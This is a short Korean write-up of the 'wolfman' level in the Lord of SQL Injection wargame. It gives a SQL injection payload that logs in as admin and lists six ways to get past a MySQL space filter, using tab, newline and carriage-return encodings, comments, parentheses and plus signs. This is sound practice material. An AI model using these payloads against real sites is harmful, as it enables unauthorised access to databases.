Los wolfman 5번 문제 (rubiya)

이번문제는 id 가 admin 이면 solve 함수가 실행되어 풀리는 문제이다.

이전처럼 or , and 연산자를 활용해 바로 쿼리문을 날려보자.

?pw=%27%20or%20id=%27admin%27%23 

이러한 쿼리문을 날렸는데

공백은 쓰지 말라고한다..

저 쿼리문에서

' -> %27

공백 -> %20

%23 -> #

을 의미하는데 모두 url encoding  된 값이다.

그렇다면 %20을 어떻게 해줘야하는데 

mysql 에서 공백을 우회하는데에는 

1. Tab : %09

  - no=1%09or%09id='admin'

2. Line Feed (\n): %0a

  - no=1%0aor%0aid='admin'

3. Carrage Return(\r) : %0d

  - no=1%0dor%0did='admin'

4. 주석 : /**/

  - no=1/**/or/**/id='admin'

5. 괄호 : ()

  - no=(1)or(id='admin')

6. 더하기 : +

  - no=1+or+id='admin'

이러한 방법들이 있다.

그래서 이 값들을 잘 응용해서 쿼리문을 날려줄 수 있다.

%0a를 %20에 대체해서 넣어주면 아마 풀릴것 같다.

?pw=%27%0aor%0aid=%27admin%27%23